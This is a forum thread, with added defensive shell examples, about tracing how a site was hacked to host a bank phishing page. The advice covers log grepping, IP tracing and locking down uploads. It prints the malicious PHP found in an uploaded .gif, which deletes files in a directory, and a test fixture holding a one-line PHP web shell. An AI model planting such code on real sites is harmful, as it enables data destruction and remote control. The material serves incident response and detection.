One day I got this from my host: My site is using a self-programmed admin panel (htaccess and user/password protected) for writing news, charts, lyrics, uploading pics, editing PHP files directly online... People visiting the website were also able to submit news and upload pictures, which then had to be activated by the admin in the admin panel. Could this be the issue, that someone uploaded those files and directories?
Is this a dedicated box? We can't really say what the problem was without looking at the code. What you need to do is check your file permission settings and scan your code for any holes. If you have any 3rd-party software, make sure it is all up to date. Make sure you check your site for any hidden iframes and remove them ASAP.
Go through your access logs and look for strange entries as well as brute-force attempts (a huge list of the same IP trying to access your admin panel over and over again).
With such warnings, based on already existing abuse, you normally have a deadline of a few hours only. It is apparent that you have a lack of knowledge and also gave too little info to help more precisely. URL?! To get real help you need to give facts about all the software; most efficient is the URL of the site. Then:

1. Ask your host politely for help, especially the date, time or details of the security breach of your site.

2. With that data you should then start a complete search of all your log files, i.e. Apache error_logs, access_logs, /var/log/warn, /var/log/messages. Search:

    grep "Invalid user" /var/log/messages

You see a lot of lines similar to:

    Invalid user a from 62.123.192.212
    Invalid user fluffy from 147.46.69.170
    Invalid user admin from 147.46.69.170
    Invalid user test from 147.46.69.170

These are the hundreds or thousands of usual DAILY hacker attempts we all have on our machines. Make sure NONE of them was successful! Also go through the mail logs: visual search near and before the date of the incident. Look for Google referrers from a month or several months back. If you have limited knowledge, then chances are you have been hosting cybercriminals many times. Look in ALL previous (at least one year back) access_logs for entries of files that do NOT belong to you. Look INTO (open in an editor!) all index.php files. Look in the access_logs for strings like "paypal", "ebay" etc. (all the typical phishing mails). Hackers often leave files behind, or at least during the actual USAGE of the files you WILL have log entries!

MEANWHILE, until you have found the EXACT root cause and SOLVED it by securing, you seriously and instantly should: freeze all login software, either by disabling all software; disable ALL upload of ANY and every kind of file; chmod 000 all folders in admin sections and/or upload sections; chmod 000 all interactive areas; replace password login by server key login AND completely DISABLE all password login site-wide!
Make a LIST of all files; DOWNload all files for offline verification of FILE content. Hackers/phishers often use COMMON file names already existing in a normal site and change their content into hacker content, such as for example index.php, which often is the hacker's admin panel with all functionalities. By doing the above you may lose traffic, but you may be able to save the site. By being too negligent you may lose your site, and your host correctly shuts down everything, including YOU, especially since the planet has a rather poor reputation of hosting hackers and questionable sites and activities. Cybercrime is something as serious as robbing a bank; hosting cybercrime, even if done out of gross negligence, is as serious as the hacker activities themselves. Hence ACT now: until solved, forget weekend and sleep, get coffee and use GOOGLE, search for "security alert" (and add ONE by ONE every single piece of your installed software) to see which software you have did have or does have known security bugs. Scan your site using NESSUS, full scan. You get a huge output with lots of details. Solve every security problem step by step. It may take you until near Christmas; it took me many hundred hours when I was in your situation some 2 years ago.
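The "Invalid user" check from the post above, as an added example that is not part of the thread: it summarises the attempts per source IP and then does the follow-up the post asks for, checking whether any of the brute-forcing IPs ever got an "Accepted" login. The syslog lines are constructed for the example (OpenSSH's format as written to /var/log/messages or /var/log/auth.log); the two IPs are the ones quoted in the post.

```shell
#!/bin/sh
# Added example, not from the thread: per-IP summary of sshd "Invalid user"
# attempts, plus a check for successful logins from the same IPs.
# The log lines below are CONSTRUCTED for this example.

LOG="${TMPDIR:-/tmp}/example_messages.$$"
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
Jan 16 23:58:02 www sshd[2210]: Invalid user a from 62.123.192.212
Jan 16 23:58:05 www sshd[2210]: Failed password for invalid user a from 62.123.192.212 port 40112 ssh2
Jan 17 03:12:44 www sshd[2231]: Invalid user fluffy from 147.46.69.170
Jan 17 03:12:51 www sshd[2233]: Invalid user admin from 147.46.69.170
Jan 17 03:12:58 www sshd[2235]: Invalid user test from 147.46.69.170
Jan 17 03:13:01 www sshd[2235]: Failed password for invalid user test from 147.46.69.170 port 41232 ssh2
Jan 17 03:20:11 www sshd[2301]: Accepted password for webmaster from 147.46.69.170 port 51120 ssh2
Jan 17 09:00:00 www sshd[2500]: Accepted publickey for webmaster from 10.0.0.5 port 50000 ssh2
EOF

# "Invalid user" attempts per source IP, most active first.
# Output: one "<count> <ip>" per line.
invalid_user_summary() {   # $1 = log file
    grep 'sshd\[[0-9]*\]: Invalid user ' "$1" \
        | sed -n 's/.* from \([0-9.]*\)$/\1/p' \
        | sort | uniq -c | sort -rn \
        | awk '{print $1, $2}'
}

# Successful logins from any IP that also ran "Invalid user" attempts.
# Output: one "<ip> <user> <auth-method>" per line.  Empty output is what
# you want to see; a line here means a password was guessed or already
# known to the attacker.
successful_logins_from_attackers() {   # $1 = log file
    invalid_user_summary "$1" | awk '{print $2}' | while read -r ip; do
        ip_re=$(printf '%s' "$ip" | sed 's/\./\\./g')   # literal dots in the regex
        grep "sshd\[[0-9]*\]: Accepted .* from $ip_re " "$1" \
            | sed -n 's/.*Accepted \([a-z]*\) for \([^ ]*\) from \([0-9.]*\) .*/\3 \2 \1/p'
    done
}

invalid_user_summary "$LOG"
successful_logins_from_attackers "$LOG"
```

In the constructed data the IP that ran three guesses later logs in with a password as "webmaster", which is exactly the case the post says you must rule out; the key-based login from 10.0.0.5 is not reported because that IP never ran a guess.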
OK, all third-party software is up to date! Secondly, my friend who is managing the server is quite good. I don't have SSH access and will ask them for the logs, but they are so huge; any command to just grep the logs for specific files or directories? I will try Nessus. I will also check for the PayPal and iframe stuff, but I doubt there is something. Thanks for helping me a bit, I'm so frustrated!
PayPal is just one possibility of a phishing site setup, and since the names or folders for a PayPal phishing site often contain the word "paypal", such log entries in OLD log files would be easy to find. Other phishing site setups include most major banks such as Citibank, eBay, Amazon, etc., anything that has online accounts and online login. If you understand the method of how hackers set up a phishing site, then you also know how to search for ANY other phishing site or MASS-mailing setup on your site.

Keep in mind that your host HAD a complaint; complaints of that nature always are the result of EXISTING evidence. Hence you still HAVE a security hole in YOUR part of the site, NOT in the hosting/server part of the site. Hosts/servers seldom or never are the risk factor; the only risk ALWAYS is the webmaster and his lack of knowledge to properly configure and secure HIS installed software.

For your info, precise numbers from early this year to yesterday: I had exactly 218937 brute-force password crack attempts on my server. That's a lot, and you most likely have similar but are never aware of it because it is out of YOUR control. In addition to such sshd attacks there are a comparable number of OTHER attempts, for me AND for you. You may most safely assume that YOUR site is UN-secured until the very moment when YOU have actively secured your site in all aspects of software usage beyond installing scripts. Installing and configuring scripts is the tiny part; securing it all is the real work of a webmaster. The latter part may take many hundreds of hours of study of all aspects of the scripts installed by you on your server, plus an equal period of time to actually search, find and secure all parts of your site.
Nessus is one possible powerful way to check and search for known security breaches. Searching ALL your log files, using tools and visually searching, is the other method. Unless you have FOUND the entry point and understood the procedure used by the hackers, and have then fixed that hole, your site and your host are compromised and still at risk. Hackers come in intervals: a few days active, then weeks or months passive to make you believe all is fine, then another rush on your unsecured site... year after year, until you have fixed all holes OR reduced the scope of your www activities to a range that you fully understand and fully secure based on true existing knowledge. I call that principle "always stay within your own limits" of what you know, understand and are able to fully control AND secure. NO need for any frustration; this is a CHALLENGE to make you a better, more responsible and more secure webmaster!
Just a quick reply: it isn't PayPal or such things, it's boveda.banamex.com.mx/serban/emp/ something; only this was found on the server and reported by the host. Also, I'm not good at PHP or Linux yet; I'll study this later. At the moment I'm a stupid model travelling the world and not having time at all. The logs are so huge; any command to grep only the lines we need, from a specific date or file?
Fine; for you, PayPal may have become much too tough to crack now. As I mentioned below ... etc.! Hence NOW you know what to do, hopefully having the files uploaded/reported.

1. Assuming you are a professional and have Linux offline as well, you do:

2. cd to the directory where you have ALL your past access_log files, then in the shell:

    zgrep "boveda.banamex.com.mx" access_log-2007*.gz >> hacker.txt

(use ANY and every string or path found by your host and reported to you, by replacing the above "boveda.banamex.com.mx"!)

FYI, I am sure you already checked WHO the damaged party is: banamex.com.mx is a Mexican bank (BANCO NACIONAL DE MEXICO), and the Mexican bank account holders may be the damaged persons as a result of your cooperation in hosting hackers. Hence a delay in YOUR securing your site may bring either Interpol to you or American law enforcement, depending on where you reside these hours and days. Bank robbery is a crime in ALL countries of this planet, and what the hackers did is nothing short of a modern way to rob a bank (banamex.com.mx)! The above zgrep line may need to be adapted to your precise file name for access_log files, but may be correct as is in the default Apache configuration.

The above copy/paste bash line does a complete search of ALL your 2007 access log files and writes the output into the text file hacker.txt. Then you see in the above hacker.txt file the FIRST dates and the IPs used. With ALL the IPs found you do again:

    zgrep "xxx.yyy.zzz.aaa" access_log-2007*.gz >> hacker_IP_xxx.yyy.zzz.aaa.txt

Replace xxx.yyy.zzz.aaa by a correct IP used by the hackers; repeat the above IP search for EACH IP. Now, after all that, search for the FIRST IP occurrence date + time, then go with a regular text editor into the uncompressed access_log file of that date and SEARCH visually line by line back and forth around those minutes and seconds of the first occurrence of the hacker's IP: what URL on YOUR site did they visit first, what was the referrer in their first visit. Then you should know the software with the security bug, and study through Google all security alerts or configuration errors that made it possible for hackers to enter your site.

RE your: "at the moment im a stupid model traveling the world and not having time at all." YES indeed, you may be stupid to throw away your life. Having a web site and having NO time means YOU don't care about the real and total damage hackers may do WITH your active support and help. Gross negligence, omission to secure your site, may very definitely be considered by ANY smart court of law as CO-operation with hackers, and some hackers may be simple terrorists; hence you may be eligible for a visit by any law enforcement agency or Homeland Security, unless you travel very fast into the deepest bush and wait for a few decades, or unless you really have no time and prefer to spend a few years behind bars...!!??!!! If YOU have a site, then YOU also have a legal liability and responsibility to keep your site free from abuse by hackers and terrorists! If you really have no time, then it would be your legal responsibility to ask your host TO SHUT DOWN your entire site until you find time to do what you are responsible to do: your civil duties and responsibilities as a site owner and caring citizen of this planet's human society! Think twice whether you HAVE time on your own or whether you want law enforcement authorities to GIVE / make you time. It's your life and your FREEDOM at stake as well, in addition to the wellbeing of any number of possibly damaged Mexican bank account holders.
Thanks mate. I did shut down the site until I solve this issue. Modelling I started because I had personal problems I might have been running away from, and to try to sort my life and thoughts while doing a bit more travelling. I don't see it as important. I know it's my task and responsibility and that's why the website is down! I respect, understand and know what you are talking about. And yes, I already paid upfront 1 year of uni in Sydney to study IT; I'm not that stupid. Thanks for all the info and I will let you know as soon as I have results. You are very helpful, I must say. Thanks
I got a similar problem before. What happened was that the hacker knew my password to my box, so he just logged on as me and uploaded the phishing site. So make sure you change all your passwords, including your email account. REMEMBER to reformat your PC or scan for viruses. In my case, I think the guy knew my email account and hence knew everything from there. So now I reformatted the PC just in case.
What some hackers do is put a shell (it's a PHP script that acts like an FTP manager, DB manager, etc.) in a .GIF file and then upload it to your server; then they locate it, use those commands of theirs and get root access. Maybe you should take that function out.
You must be kidding, still using a password to access your box; that was last millennium we did such, but these years we use server-key controlled access and SSH! How many password crack attempts did/do you have per year on your box? I had this year so far almost a quarter million! See my most recent blog article on site security on sp360.

That upload thing, that's the karma of/for all those who want others to fill their box and create all the content that brings the traffic and AdSense $! In my above security blog article I have a full example of how hackers attempt to abuse sites which allow uploads: to upload hacker stuff like the shell you mentioned, or virus-infected files in almost any format. The preventive measure is to always and only create all your content yourself and thus to have no upload permission for anyone else but you, and then via SSH/server key. Better have a smaller site but safe/secure and fun than an oversized and out-of-control site that rocks you into copyright infringement and hackers' hell.

Look at all those giants like Blogger, Blogspot, MySpace, hi5, spaces.live and the many picture "sharing" sites and forums; many grow so huge that they most likely need an attorney on 24/7 just to keep out of lawsuits due to all the illegal stuff going on on their sites. All the above-named blog/social sites are copyright infringers by the thousands each year, multiplied by thousands of other damaged creators of material stolen and illegally uploaded to OTHER servers; a truly dynamic and up-to-date attorney could start a huge class-action lawsuit under federal law to once and forever stop such huge server abuse on inadequately controlled and poorly managed sites/servers. The damage done to owners of stolen material and the damage created by hacked sites may easily go into a 2-3 digit billion $/yr range.
One more reason to stay clean and keen, and to keep nights and off-hours so quiet and relaxing that you actually can enjoy life without having to fear some law enforcement knocking at your door for hosting hackers or cyber criminals...
Thanks guys for all the info; I hope my mate is sending me the logs soon. I removed the upload function already and will change all passwords! Thanks. But wouldn't the htpasswd thing protect my admin panel anyway? Or is that easy to crack?
htpasswd has quite little to NOTHING to do with the way hackers crack your site. If you look at some of the most recent security posts I made in the last few days in my blog (sig link), then you find precise real-life samples of how hackers do things, and none of these real-life hack scenarios has anything to do with passwords at all, but with script securing and (by hackers and the world) KNOWN security vulnerabilities of popular scripts. Most of these bugs are known, but the fixes are never applied, because the site owners have far too little or NO understanding of all site/security-relevant stuff. In most hacker cases such as yours, and the last 10 or so I looked at during the past few days, it always was a beginner site, an easy MFA or similar site where no considerable time had been invested to secure ALL scripts on the system or on the web space of the site. Many are "just business" sites of people who just want to make money and have no time for such, and believe that their host is doing their work for the 5-10 $ vhost fee per month. Site monitoring and securing may easily take up to many DOZEN extra hours for a single site PER month.

Site securing starts with actually STUDYING the installed scripts: what they do, how they do what they do, what additional members suddenly are allowed to do... If MEMBERS can upload stuff, then most likely hackers can as well; it is just a matter of the hacker's own creativity and experience. Typical hackers are actually GOOD for you, because they invest as much time and effort to hack your and others' sites as the site OWNER/operator SHOULD invest in running a site safely for all of society. Operating a site securely/safely is always BEST done if you have instant and continuous 24/7/365 access to ALL logs LIVE, i.e. NOT the compressed ones after they are full, but the running ones, like all logs for mysql, mail, warn, messages, Apache errors, Apache access etc., for monitoring and finding in real time what NEW things hackers attempted.
Old logs are for site forensic use only, like in your case. Nessus will show you existing vulnerabilities as well as solutions to them by scanning all possible/existing scripts known to Nessus, for preventive security. That again has nothing to do with the htpasswd stuff; htpasswd is just ONE out of ten thousands of possibilities to crack/hack a site.
I think I found it. I found a .gif file that was uploaded and contained:

    <?
    echo "Ãðåâåä, Ãèêêà ðäåã!";
    $dh = opendir("../../links");
    while ($filename = readdir($dh)) {
        echo $filename."<br>";
        unlink("../../links/$filename");
    }
    ?>

How can you prevent this from happening, other than disabling the ability to upload GIF files? The date was Jan 17th, so I still need to wait until my mate sends me the logs. What would be the command to grep all log entries from that date?
To prevent it: avoid ANY and every upload! Or prevent execution of PHP; that is only possible if you are in a Perl or HTML folder of your site. Check the passwords of any users; ban/delete users with insecure passwords, with NO warning, else they may re-sign up under a different name. Use users/members with true names only, and a few other general security measures. OTHERS here may have more help; I prefer strictly to stay within MY limits, hence on MY server ONE person only uploads: ME.

To search, when you have got all your log files: search back in time. There might be OTHER hacker visits by OTHER hackers as well, long before that date, or by the same hackers but with OTHER files. You may want to search the hacker's IP back up to a year or more. A few steps you do; now it may be zgrep, since old access_log files are all compressed. All else equal:

1. zgrep "your_gif_file-name.gif" access_log-2007*.gz >> hacker_access.txt

That would be the exact Apache 2 format including the date; in this search with a wildcard you zgrep all log files starting from the first log file of 2007 until the last file. You may also go back to 2006. Adapt the precise file name to your precise log naming. That gives you as output, written into the file hacker_access.txt, all log lines that included the use of the above-found gif file. The oldest use is the most accurate to find the actual weak point in your system: the precise door or upload facility that causes your risk. Of course, by the above zgrep you also find what IP or IPs the hackers used when accessing that file.

2. Then you do another zgrep using the IP(s) related to the use of the above-mentioned gif file, because hackers may have done much more than just use the file:

    zgrep "xxx.yyy.zzz.abc" access_log-2007*.gz >> IP_list_hackers.txt

Replace xxx.yyy.zzz.abc by the actual IP. If you have several IPs related to the use of the above gif file, then repeat the above procedure but write into a separate file for each IP to have a better overview.

3. Then write down the exact times, start to end of each "visit", then search through the other log files: Apache error_log plus /var/log/warn, /var/log/messages and others (mysql, mail, etc.). Normally you have NO access to these additional logs, unless you are lucky like me and run a root server as your bride; bride, because you spend your nights as much as your days with a root server! If NOW you have a friend at your hosting, you may get the above-mentioned additional logs if you explain why, and research the exact seconds/minutes during the visits to see what else they did. You may find surprises, hence better secure yourself in a chair with a belt... to avoid fainting or falling into a coma. You may also ask your server host to run a rootkit check to see if they are infected in their system as a result of your guests. You may find anything from more phishing sites, to chat bots, to mass-mailing systems; most or all of these files may be deleted from your HDD but leave traces in your logs, to be found with the related IPs.

Study this case exactly and in all aspects from all sides; it may become a most valuable real-life learning scenario, and it may result either in your decision to reduce the potential of your online activities to regain the freedom to sleep and have leisure time, or to shut down entire sections of your site, or to change your job, or to become a security expert... It may take you time, up to hundreds of hours for the above; you will most likely do much just using your own senses, skipping through all the grep-found lines, but you have a unique situation to really learn and appreciate security for the future.
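The zgrep pivot described in the two long posts above (search the rotated, compressed access logs for an indicator, pull the client IPs out of the hits, then look at everything those IPs did, oldest first, and pull out one date), as an added example that is not part of the thread. It runs over a constructed set of gzip-compressed Apache logs in Combined Log Format: the indicator strings are the ones from the thread (the reported banamex path and an uploaded .gif), while the client IPs, request paths, referrers and file names are invented for the example.

```shell
#!/bin/sh
# Added example, not from the thread: indicator -> IPs -> per-IP timeline
# over rotated access_log-YYYYMMDD.gz files, the way the posts describe.
# The log lines, IPs, paths and referrers below are CONSTRUCTED.

WORK="${TMPDIR:-/tmp}/example_logs.$$"
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/access_log-20070115" <<'EOF'
203.0.113.9 - - [15/Jan/2007:22:41:03 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120 "http://www.google.com/search?q=inurl:news.php+upload" "Mozilla/4.0"
203.0.113.9 - - [15/Jan/2007:22:43:40 +0000] "POST /submit_news.php HTTP/1.1" 200 311 "http://www.example.com/news.php?id=12" "Mozilla/4.0"
EOF
cat > "$WORK/access_log-20070117" <<'EOF'
203.0.113.9 - - [17/Jan/2007:04:10:22 +0000] "GET /uploads/pic0117.gif HTTP/1.1" 200 1403 "-" "Mozilla/4.0"
203.0.113.9 - - [17/Jan/2007:04:12:08 +0000] "GET /links/boveda.banamex.com.mx/serban/emp/index.php HTTP/1.1" 200 8804 "-" "Mozilla/4.0"
192.0.2.44 - - [17/Jan/2007:11:30:00 +0000] "GET /links/boveda.banamex.com.mx/serban/emp/login.php HTTP/1.1" 200 2210 "http://mail.example.net/" "Mozilla/5.0"
EOF
gzip -f "$WORK"/access_log-2007*

# Step 1: every request mentioning the indicator, across all compressed
# logs, prefixed with the file it came from (what zgrep prints for several files).
hits_for_indicator() {   # $1 = indicator string, $2 = log directory
    zgrep -H -F "$1" "$2"/access_log-2007*.gz
}

# Step 2: the distinct client IPs behind those hits.
ips_for_indicator() {
    hits_for_indicator "$1" "$2" | sed 's/^.*\.gz://' | awk '{print $1}' | sort -u
}

# Step 3: everything one IP requested, oldest first.  The rotated files sort
# by name, so the glob yields them in date order, and lines inside a file are
# chronological.  Output: "<timestamp> <request> <referrer>".
requests_from_ip() {     # $1 = IP, $2 = log directory
    pat=$(printf '^%s ' "$1" | sed 's/\./\\./g')   # anchored, literal dots
    zgrep -h "$pat" "$2"/access_log-2007*.gz | awk -F'"' '{
        ts = $1; sub(/^[^[]*\[/, "", ts); sub(/\].*$/, "", ts)
        print ts " " $2 " " $4
    }'
}

# The first request from an IP is where they came in: which page, and from
# which referrer (a Google search in the constructed data).
first_request_from_ip() {
    requests_from_ip "$1" "$2" | head -n 1
}

# All entries for one date, which is the "grep only that date" question:
# the date is the start of the bracketed timestamp.
entries_on_date() {      # $1 = dd/Mon/yyyy, $2 = log directory
    zgrep -h -F "[$1:" "$2"/access_log-2007*.gz
}

ips_for_indicator boveda.banamex.com.mx "$WORK"
first_request_from_ip 203.0.113.9 "$WORK"
entries_on_date 17/Jan/2007 "$WORK"
```

In the constructed data, the indicator turns up two IPs; one of them (192.0.2.44) is just a phishing victim arriving from a webmail link, the other (203.0.113.9) first appears two days earlier coming from a Google search and posting to the public news form, which is the "what URL did they visit first, what was the referrer" question the post tells you to answer before you go looking for the vulnerable script.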
Oh wow, I thought .htaccess was pretty solid. Unless you had a weak password or something, who knows. I suggest you check out http://thefirewallscript.com though. Seems like a pretty solid script.
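The .gif-that-is-really-PHP finding earlier in the thread, and the question of how to catch it without banning image uploads altogether, as an added example that is not part of the thread: a check that an uploaded file actually starts with the magic bytes of the image type its extension claims, and a second check for PHP open tags anywhere in the file (a valid image with PHP appended after the image data passes the first check but not the second). The four files are constructed in a temporary directory for the example; the file names and verdict strings are mine.

```shell
#!/bin/sh
# Added example, not from the thread: two checks for files in an upload
# directory, run over CONSTRUCTED sample files.

UP="${TMPDIR:-/tmp}/example_uploads.$$"
mkdir -p "$UP"
trap 'rm -rf "$UP"' EXIT

# A genuine 1x1 GIF89a.
printf 'GIF89a\001\000\001\000\200\000\000\000\000\000\377\377\377,\000\000\000\000\001\000\001\000\000\002\002D\001\000;' > "$UP/real.gif"
# What the poster found: PHP source saved under a .gif name.
printf '<? $dh = opendir("../../links"); while ($f = readdir($dh)) { unlink("../../links/$f"); } ?>' > "$UP/fake.gif"
# A real GIF with PHP appended after the image data: the header is fine.
cat "$UP/real.gif" > "$UP/stuffed.gif"
printf '<?php system($_GET["c"]); ?>' >> "$UP/stuffed.gif"
# A JPEG header under a .gif name.
printf '\377\330\377\340\000\020JFIF\000' > "$UP/mislabelled.gif"

# Does the file start with the magic bytes of the type its extension claims?
# Only the three image types a picture-upload form typically allows.
magic_matches_extension() {   # $1 = path; returns 0 if it matches, 1 otherwise
    ext=$(printf '%s' "$1" | sed 's/.*\.//' | tr 'A-Z' 'a-z')
    hdr=$(head -c 8 "$1" | od -An -tx1 | tr -d ' \n')
    case "$ext:$hdr" in
        gif:474946383961*|gif:474946383761*) return 0 ;;   # GIF89a / GIF87a
        jpg:ffd8ff*|jpeg:ffd8ff*)            return 0 ;;   # JPEG SOI marker
        png:89504e470d0a1a0a*)               return 0 ;;   # PNG signature
    esac
    return 1
}

# Is there a PHP open tag anywhere in the file?  -a forces grep to treat
# binary data as text so the image body is searched too.
contains_php() {   # $1 = path; returns 0 if a tag is found
    grep -q -a -E '<\?(php|=|[[:space:]])' "$1"
}

# Verdict for one file: "ok", "bad-magic", "contains-php" or both.
classify_upload() {   # $1 = path
    verdict=""
    magic_matches_extension "$1" || verdict="bad-magic"
    if contains_php "$1"; then verdict="${verdict:+$verdict,}contains-php"; fi
    printf '%s\n' "${verdict:-ok}"
}

# One "<name> <verdict>" line per file in the directory.
scan_upload_dir() {   # $1 = directory
    for f in "$1"/*; do
        printf '%s %s\n' "$(basename "$f")" "$(classify_upload "$f")"
    done
}

scan_upload_dir "$UP"
```

The scan is a detection, not a fix: the durable fix for the case in the thread is to make sure the web server never runs anything from the upload directory as a script (for mod_php, `php_flag engine off` in an .htaccess for that directory, or removing the PHP handler there), so that even a file the checks miss is served as bytes rather than executed. That configuration detail is my addition, not something the thread states.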